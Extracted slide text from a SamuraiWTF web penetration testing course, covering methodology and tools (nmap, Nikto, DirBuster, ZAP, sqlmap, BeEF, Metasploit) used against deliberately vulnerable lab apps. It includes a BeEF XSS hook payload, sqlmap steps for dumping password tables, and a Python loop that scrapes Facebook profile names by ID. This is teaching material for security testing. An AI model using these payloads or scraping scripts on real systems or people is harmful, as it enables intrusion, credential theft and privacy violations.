Escolar Documentos
Profissional Documentos
Cultura Documentos
SamuraiWTF
Justin Searle
Managing Partner UtiliSec
justin@meeas.com // justin@utilisec.com // @meeas
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
CC Attribution-ShareAlike
Course Contributors
Course Authors
Justin Searle - justin@utilisec.com - @meeas Raul Siles - raul@taddong.com - @taddong
Course Sponsors
UtiliSec http://www.utilisec.com Secure Ideas L.L.C. http://www.secureideas.net Taddong S.L. http://www.taddong.com
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Student Challenge
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 4
SamuraiWTF
Live testing environment as an ISO file Based on Ubuntu Linux Over 100 tools, extensions, and scripts, included: w3af Maltego CE BeEF Nikto Burp Suite WebScarab Grendel-Scan Rat Proxy DirBuster nmap
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 7
NodeZero Pentesting for all environments (Ubuntu Pentest Live) SamuraiWTF OWASP Live CD Focus on pentesting for Web Applications Showcase major OWASP tools & projects
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
SamuraiWTF 2.0
Complete rebuild of the distribution Includes KDE, Gnome, and Unity Doubled the number of tools All tools now accessible in $PATH Moved all software and configurations to Debian packages
Upgrade all tools with "sudo apt-get upgrade" Add SamuraiWTF tools to any Ubuntu/Debian installation by editing "/etc/apt/sources.list" Facilitates collaboration within dev team
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 9
Project URLs
Main project page:
http://www.samurai-wtf.org
Project Leads:
Kevin Johnson - kjohnson@secureideas.net - @secureideas Justin Searle - justin@utilisec.com - @meeas Raul Siles - raul@taddong.com - @taddong
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
10
Once created, edit your virtual machine and point the VM machine's CD/DVD virtual drive a the SamuraiWTF ISO file on your hard drive Boot your virtual machine and verify SamuraiWTF starts up Don't install SamuraiWTF to your virtual hard drive for this class Look around and see if your neighbors need any help J
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 11
Walkthrough of SamuraiWTF
Logging In and Using sudo/kdesudo/gtksudo
Username: samurai Password: samurai http://whatisthesamuraipassword.com
Choosing KDE, Gnome, or Unity SamuraiWTF Tools and Documentation Firefox Extensions
https://addons.mozilla.org/en-US/firefox/ collections/rsiles/samurai/
Testing Methodology
Because we are professional pen-testers
You cant see the wood for the trees
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Types of Tests
Black box testing
Little to no information is provided Extra time spent on Recon and Mapping
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
14
Formal Methodology
A simple methodology:
Recon: Gathering information from external sources about your target Mapping: Learning about the target app from a user's AND a developer's perspective Discovery: Learning the app from an attacker's perspective Exploitation: Attempting to measure the true risk of discovered vulnerabilities
Recon
Exploitation
Mapping
Successful exploitation often leads to new functionality to map and a second layer of vulnerabilities to discover
Discovery
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
15
Recon
Exploitation
Mapping
Discovery
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Samurai Dojo-Basic
Author: Justin Searle Site: Purpose: A PHP/MySQL web application that implements the OWASP Top 10 vulnerabilities. This project was forked from the 1.x branch of Mutillidae (which we'll cover later in this course) Accessing:
http://dojo-basic
Register a username, password & signature
Features:
Basic web app designed for first time web pentesters Easily Includes learning hints Mapped to OWASP Top 10
18
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Exploitation Tools:
Manual techniques Add N Edit Cookies Selenium
Firebug Wappalyzer
Discovery Tools:
User Agent Switcher iMacro Selenium Tamper Data
Interception SQLi / XSS fuzzing
Of course, some tools apply to multiple testing phases (e.g. Tamper Data: Mapping, Discovery and Exploitation?)
19
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Recon
The most under utilized steps
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Reconnaissance Steps
Exploitation
Mapping
Discovery
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
21
Step 1: Recon
Recon is one of the most under utilized steps Findings here allow you to start building assumptions to test Provides key information needed for later steps
Selection and verification (most important) of targets Information about technologies used and configurations Lists of users, employees, and organization info Password reset information and contact information Trust relationships to exploit (friends and managers) Even occasionally find code snippets with vulnerabilities and authentication information
Don't make this mistake on your tests!!! Check out the appendix for some info on tools and exercises
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 23
Mapping Dojo-Basic
Firefox
Tamper Data
Firebug
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Mapping Steps
Recon
Exploitation
Discovery
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
25
Firefox
Author: Mozilla Foundation Site: mozilla.org Purpose: a full featured, cross platform web browser. Now includes a mobile version for your smartphone Language: C++ Notable Features: Extensions (add-ons)!!! Caveats: still thinking Secret trick:
Open a second Firefox process and profile:
firefox -p
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
26
Error Console
Determine if you browser is properly rendering the page
Tamper Data
Author: Adam Judson Site: http://tamperdata.mozdev.org & https://addons.mozilla.org/en-us/firefox/ addon/tamper-data/ Purpose: A Firefox extension to track and modify HTTP/HTTPS requests Language: Firefox add-on Features:
Modify HTTP(S) headers and POST parameters HTTP request/response tracing & timing GET parameters & HTTP(S) responses?
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 30
Firebug
Author: FirebugWorkingGroup et. al. Site: http://getfirebug.com & https://addons.mozilla.org/en-US/firefox/ addon/firebug/ Purpose: Set of web development tools Language: Firefox add-on Features:
Inspect & modify HTML, CSS, XML, DOM JavaScript debugger & profiler Error finding & monitor network activity
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 31
Mapping Exercise
Which operating system is hosting the application? Which web server and/or application server is hosting the application? Which language is the application written in? Which programming model did the developer use?
Front Controller uses a single page for all functionality
/index.aspx?action=AddToCard&Item=42
Model View Controller (MVC) can be much more complex, often using the resource path to specify input instead of actual files and directories
/Product/AddToCard/42
What functionality does the application provide? Are there any process flows involving multiple pages? Have you visited every page and recorded each possible request/response pair?
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 32
Dojo-Basic Discovery
User Agent Switcher
Tamper Data
- Interception
- SQLi / XSS fuzzing
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Discovery Steps
Recon
Exploitation
Mapping
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
34
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
35
Information Leakage
Fingerprinting artifacts
Identify the hardware, OS, webserver, appserver, proxies, WAFs, programming language, database, backend, etc
User artifacts
Usernames and passwords Personally Identifiable Information (PII)
Error messages
Username is correct but password is not You have 3 more attempts You have been locked out for 5 minutes The username already exists
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 36
Mis-Configurations
Things that people forgot to do
Change default usernames and passwords Change default permissions and configurations Remove default contents and scripts Block admin web interface from the Internet
Injections
Cross Site Scripting (XSS) Cross Site Request Forgery (CSRF) SQL injection Command injection Malicious file execution Local and remote file inclusion
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
38
Control Bypass
Allows attackers to bypass various controls such as:
Authentication Authorization Access controls Server and client sandboxes Session management
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
39
iMacro
Author: iOpus Site: http://www.iopus.com/imacros/firefox/ Purpose: Record, edit, and script macros in Firefox for automated functionality Language: Firefox add-on Features:
Record your actions and edit them later Use looping and variables to further customize Pull datasets from external sources (CSV, DBs, ...) Wrap macros in scripts for advanced funcations
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 40
Selenium
Author: Community project (Selenium IDE) Site: http://seleniumhq.org/projects/ide/ Purpose: Record and play back interactions with web browser Language: Firefox add-on Features:
Record, edit, debug and play tests (interactions)
Click, typing and other actions
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
XSS list is save to use all items in your fields Don't use drop and updates from SQLi list!
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 47
XSS-me
Author: Security Compass Site: http://labs.securitycompass.com/index.php/ exploit-me/xss-me/ Purpose: A Firefox extension that identifies reflective XSS vulnerabilities Language: Firefox add-on
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
48
SQL Inject-me
Author: Security Compass Site: http://labs.securitycompass.com/index.php/ exploit-me/sql-inject-me/ Purpose: A Firefox extension that identifies SQL injection vulnerabilities Language: Firefox add-on
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
49
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
52
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
54
Check out the other potential XSS injection points we identified earlier
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 55
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
56
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
57
Are there any other pages that show your User-Agent? Which are examples reflected and persistent XSS? Dont forget to switch back to your default UA!!!
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
58
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
59
Dojo-Basic Exploitation
Manual techniques
Add N Edit Cookies
Selenium
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Exploitation Steps
Recon
Mapping
Discovery
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
61
Step 4: Exploitation
Verifying identified vulnerabilities by attacking and exploiting them Go after the data or functionality that real attackers would go after Successful exploitation is a stepping stone and should open up a new round of mapping and discovery
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
62
Exploitation Examples
Downloading the contents of a database Uploading a malicious web page Gaining shell on the server Making a target server send data to a remote host Pivoting from the DMZ to the internal network Leveraging a target users browser to scan the internal network Exploiting target users browser vulnerabilities
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 63
Manual Techniques
Tool: Web browser (e.g. Firefox) Exercises:
index.php, login.php, add-to-your-blog.php XSS SQLi Privilege escalation to admin (index.php) Unvalidated redirects & forwards (credits.php)
Permanently modify the value through Cookie Editor, trying to escalate privileges to admin Are there other cookies used by the web app?
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 66
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
67
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Notable features:
GET requests 3 difficulty levels Includes PHP IDS
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 69
WebScarab
Session Analysis
CeWL
Exploitation Tools:
sqlmap sqlmap + ZAP BeEF BeEF + Metasploit
Discovery Tools:
DirBuster ZAP
Vuln. Scanner Fuzzer
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
70
DVWA Mapping
Nikto
FoxyProxy
ZAP (proxy)
ZAP (spider)
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Mapping Steps
Recon
Exploitation
Discovery
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
72
Fingerprinting Tasks
Port Scanning
nmap Zenmap
Platform Scanning
Nikto
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
73
nmap
Author: Fyodor (Gordon Lyon) and many more Site: http://nmap.org Purpose: Premier TCP/IP host and port scanning tool. Also provides excellent OS fingerprinting, service fingerprinting, and the Nmap Scripting Engine (NSE) which provides advanced and customizable functionality Language: C/C++ (LUA for NSE scripts) Syntax:
nmap [options] <target> sudo nmap [options] <target>
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
74
nmap Basics
nmap -sP 127.42.84.0-7
Ping sweep 8 of your localhost addresses. (actually does an ARP, ICMP, then TCP 80)
nmap 127.42.84.0/29
Port scans top 1000 TCP ports.
nmap Optimization
Finding the right balance between speed and false negatives Tune your options on a subset of IPs (first /24 of 127.42.0.0/16)
sudo nmap -p 80,443 127.42.0.0/24 sudo nmap -n -PN -p 80,443 -T5 127.42.0.0/24 sudo nmap -n -PN -p 80,443 -T5 --max-retries 0 127.42.0.0/24 sudo nmap -n -PN -p 80,443 --max-rtt-timeout 100 --min-rtt-timeout 25 --initial-rtt-timeout 50 --max-retries 0 127.42.0.0/24 sudo nmap -n -PN -p 80,443 --min-rate 10000 --min-hostgroup 4096 --max-retries 0 127.42.0.0/24
Now we have a finely tuned scan, lets run on the full /16 subnet
sudo nmap -n -PN -p 80,443 --min-rate 10000 --min-hostgroup 4096 --max-retries 0 --reason -oN /tmp/AllIPs-ports80_443 127.42.0.0/16 sudo nmap -n -PN -sS -sU -p 80,443 -A --max-retries 1 --reason -oN /tmp/LiveWebServers-Top1000TcpUdpPorts-All 127.42.84.1-5
Zenmap
Author: Adriano Monteiro Marques and nmap project Site: http://nmap.org/zenmap Purpose: Graphical nmap interface to make it easier for beginners, provide basic analysis capabilities, facilitate rescans, display network topologies, and compare scans Language: C/C++ Samurai notes:
Two menu items, one runs as root and the other does not
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
78
Zenmap Topology
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
79
FoxyProxy
Author: Eric H. Jung Site: http://getfoxyproxy.org Purpose: Web browser proxy switcher Language: Firefox add-on Features: Basic, Standard, Plus
http://getfoxyproxy.org/downloads.html#editions
Exercise:
Check all options/proxies & create a new local proxy E.g. ZAP = localhost:8080 (Burp)
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 80
Interception Proxies
Testing tools that "Man-in-the-Middle" your own traffic Provide a historic record of all interactions with the application Provide ability to intercept and modify requests Provide additional tools to manipulate and interact with the application Provide a single location to track all of your notes and findings
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 81
Updating ZAP
Simon and team published the ZAP 1.3.4 release prior to this workshop to provide the following new features:
Custom input files for the Fuzzing and Brute Force tools Ability to disable recursion in the Brute Force tool Inverse regex searches and Fuzz match highlighting Support for cookies and POST data in third party tools
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
83
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
85
Mapping Exercise
Which operating system is hosting the application? Which web server and/or application server is hosting the application? Which language is the application written in? Which programming model did the developer use?
Front Controller uses a single page for all functionality
/index.aspx?action=AddToCard&Item=42
Model View Controller (MVC) can be much more complex, often using the resource path to specify input instead of actual files and directories
/Product/AddToCard/42
What functionality does the application provide? Are there any process flows involving multiple pages? Have you visited every page and recorded each possible request/response pair?
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 86
DVWA Discovery
DirBuster
ZAP (vulnerability scanner)
ZAP (application integration)
ZAP (fuzzer)
WebScarab (session analysis)
CeWL
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Discovery Steps
Recon
Exploitation
Mapping
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
94
Nikto
Author: Sullo Site: http://cirt.net/nikto2 Purpose: A web server scanner that fingerprints, correlates to known vulnerabilities, and looks for known malicious or potentially dangerous files/CGIs Language: Perl Syntax:
nikto.pl -host <target>
Samurai notes:
Must be in /usr/bin/samurai/Nikto_2
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
95
Nikto Exercise
Instructor lead exercise:
Updating Nikto
./nikto.pl -update
Running Nikto
./nikto.pl -host dvwa
Nikto Findings
DVWA:
Server type, powered by & outdated versions HTTP methods, robots.txt & CGIs? (-C all)
TRACE method: XST
WebGoat:
Very limited web platform scan of Tomcat
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
97
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
98
DirBuster
Author: OWASP Project Site: http://www.owasp.org/index.php/ Category:OWASP_DirBuster_Project Purpose: Brute force of web directories and files Language: Java Pros:
Very quick for what it does Has the best list of default files and directories out there
Caveats:
Minor stability issues Scans can take a long time if you aren't careful with configs Can overwhelm servers (connections and log disk storage)
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 99
DirBuster Exercise
Before you do anything, turn off recursion! Takes FOREVER! Scan http://dvwa with the small directory list
Disable recursive checks and brute force file checks /usr/bin/samurai/DirBuster/directory-list-2.3-small.txt
Experiment with the other word lists and other settings Try brute forcing localhosts top level directories
Change your scanning type to Pure Brute Force Change the Char set to a-z0-9 Set min length to 1 and max length to 4 Uncheck Brute Force Files
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
100
DirBuster Findings
DVWA:
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
102
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
103
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
ZAP TokenGen
Clear all cookies in your browser Visit the home page of DVWA Find that request in ZAP History Verify the request was made without cookies and its response has a SETCOOKIE for "PHPSESSID" Right click request in history and "Generate Tokens..." Review results to verify that PHPSession is truly random. (yes, it is)
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 105
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
111
CeWL
Author: DigiNinja (Robin Wood) Site: http://www.digininja.org/projects/ cewl.php Purpose: A wordlist generator which collects words by spidering websites Language: Ruby Features: Custom dicts are very useful Syntax:
cewl [options] <target>
112
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
CeWL Exercise
Review the CeWL options
d: depth w: write to (dictionary) file e: e-mail addresses a: metadata
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
113
CeWL Findings
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
114
w3af
Author: Andres Riancho and many others Site: w3af.sourceforge.net Purpose: one of the most feature rich open source web auditing tools for both automated and semi-automated Phases: mapping, discovery, and exploitation Language: Python Notable Features:
Choice of GUI and CLI interfaces Very scriptable to re-audit apps Includes most python based web auditing tools
DVWA Exploitation
sqlmap
sqlmap + ZAP
BeEF
BeEF + Metasploit
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Exploitation Steps
Recon
Mapping
Discovery
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
120
SQLMap
Author: Bernardo Damele A. G. (inquis) Site: http://sqlmap.sourceforge.net Purpose: An automated SQL injection tool that both detects and exploits SQL injection flaws on MySQL, Oracle, PostgreSQL, and MS SQL Server Language: Python Features: Check the help (-h) Syntax: sqlmap.py -u <target> [options]
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
121
SQLMap Exercise
Review the options for sqlmap (-h) Run sqlmap on SQL flaw to verify it can see it (discovery) Use sqlmap to exploit the SQL flaw
Users & Passwords Databases & Tables (-D <database>) Dump tables contents (-T <table> -D) OS interaction
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 122
SQLMap Findings
Discovery
SQL injectable parameter: id= Back-end DB fingerprinting
Users: root DB: dvwa Tables: guestbook & users Dump: Avatar, first name, last name, password, user user ID
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 123
Non-interactive commands
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
125
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
126
BeEF
Author: Wade Alcorn and others Site: http://www.beefproject.com Purpose: A PHP (or Ruby) web-based interface for command and control of XSS-ed zombie browsers including several exploits and modules Language: PHP or Ruby Samurai notes:
PHP: /var/www/beef Ruby: /usr/bin/samurai/beef-ruby
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 127
Experiment with the different commands Insert the following hook in the XSS flaw:
<script src= http://localhost:3000/hook.js></ script> Reflected or persistent XSS
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
128
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
129
TunnelingProxy (localhost:6789)
Become the victim user on the web-app Burp Suite & sqlmap & (same domain)
Metasploit
Author: HD Moore and others (Rapid7) Site: http://www.metasploit.org Purpose: The open-source penetration-testing and exploitation (MetaSploit) Framework (MSF) Language: Ruby Notable Features:
Its up to you to decide J
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
131
Check the Browser Exploitation for Fun & Profit Series (http://bit.ly/hWXWZv)
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 132
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
133
Site:
https://github.com/xntrik/beefmetasploitplugin
Homework J
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 134
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Mutillidae
Author: Irongeek Site: http://www.irongeek.com/i.php?page=mutillidae/mutillidaedeliberately-vulnerable-php-owasp-top-10 Purpose: A PHP/MySQL web application that implements the OWASP Top 10 vulnerabilities Accessing:
http://mutillidae
Register a username, password & signature
Features:
Includes learning hints OWASP Top 10 menu
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
136
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
178
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
179
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Why Python
Pre-installed on Mac and Linux Easy to install on Windows Easy to write scripts that run on all OSes Easy to read and collaborate Very complete set of standard libraries Many stable and powerful 3rd party libraries
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
185
Python Shell
Using an interactive python shell
type python on your command line type python commands they execute when you hit enter
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
186
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
187
httplib
HTTP & HTTPS No URI Parsing Doesnt Follow Redirects Doesnt Store Cookies Authentication: None Method: Any No Proxy Support Manually Close Connection
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
188
Using httplib
Create a connection object
import httplib
Domain only
Extract payload
189
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Using urllib2
The library that does the magic
import urllib2
Dont for get the http:// This sends the request, catches the response, and extracts out the response payload
190
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
POST Requests
import urllib2, urllib url = 'http://whois.arin.net/ui/query.do' data = { 'flushCache' : 'false', 'queryinput' : '198.60.22.2'} data = urllib.urlencode(data) request = urllib2.Request(url, data) response = urllib2.urlopen(request) payload = response.read() print(payload)
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
191
url = 'http://google.com/#q=samurai-wtf' headers = { 'User-Agent' : 'Mozilla/5.0 (iPhone)' } request = urllib2.Request(url, None, headers) response = urllib2.urlopen(request) If you are doing a GET, headers = response.headers use None for data print(headers)
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 192
Writing to a File
import urllib2 request = urllib2.Request('http://www.utilisec.com') response = urllib2.urlopen(request) payload = response.read() with open('index.html', 'wb') as file: file.write(payload) Write the payload to the file
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License ! 193
Filtering Responses
import urllib2, re request = urllib2.Request('http://inguardians.com/info') response = urllib2.urlopen(request) Build your regex payload = response.read() using a raw string, grouping desired text regex = r'<dt class="title">(.*)</dt>' results = re.findall( regex , payload ) for result in results: print(result) Search payload for all instances of your regex
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
Basic Authentication
import urllib2
password_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm() password_mgr.add_password(None, url, username, password) authhandler = urllib2.HTTPBasicAuthHandler(password_mgr) opener = urllib2.build_opener(authhandler) urllib2.install_opener(opener) response = urllib2.urlopen(url) payload = response.read() print( payload )
Build and install so all requests automatically use the password manager
195
Copyright 2009-2012 Justin Searle / Raul Siles - This work is licensed under the Creative Commons Attribution-ShareAlike 3.0 License !
for item in list: url = 'http://m.facebook.com/people/a/' + str(item) try: response = urllib2.urlopen(url) Prevent missing pages from throwing except IOError: an error and stopping the script pass else: payload = response.read() Extract name from page regex = r'<strong>([^<]*)' match = re.search(regex, payload) if match: Grab url and remove redirect reference name = match.groups() site = response.geturl().split("?")[0] Format output print("{0} = {1} {2}".format(item, name[0], site) )
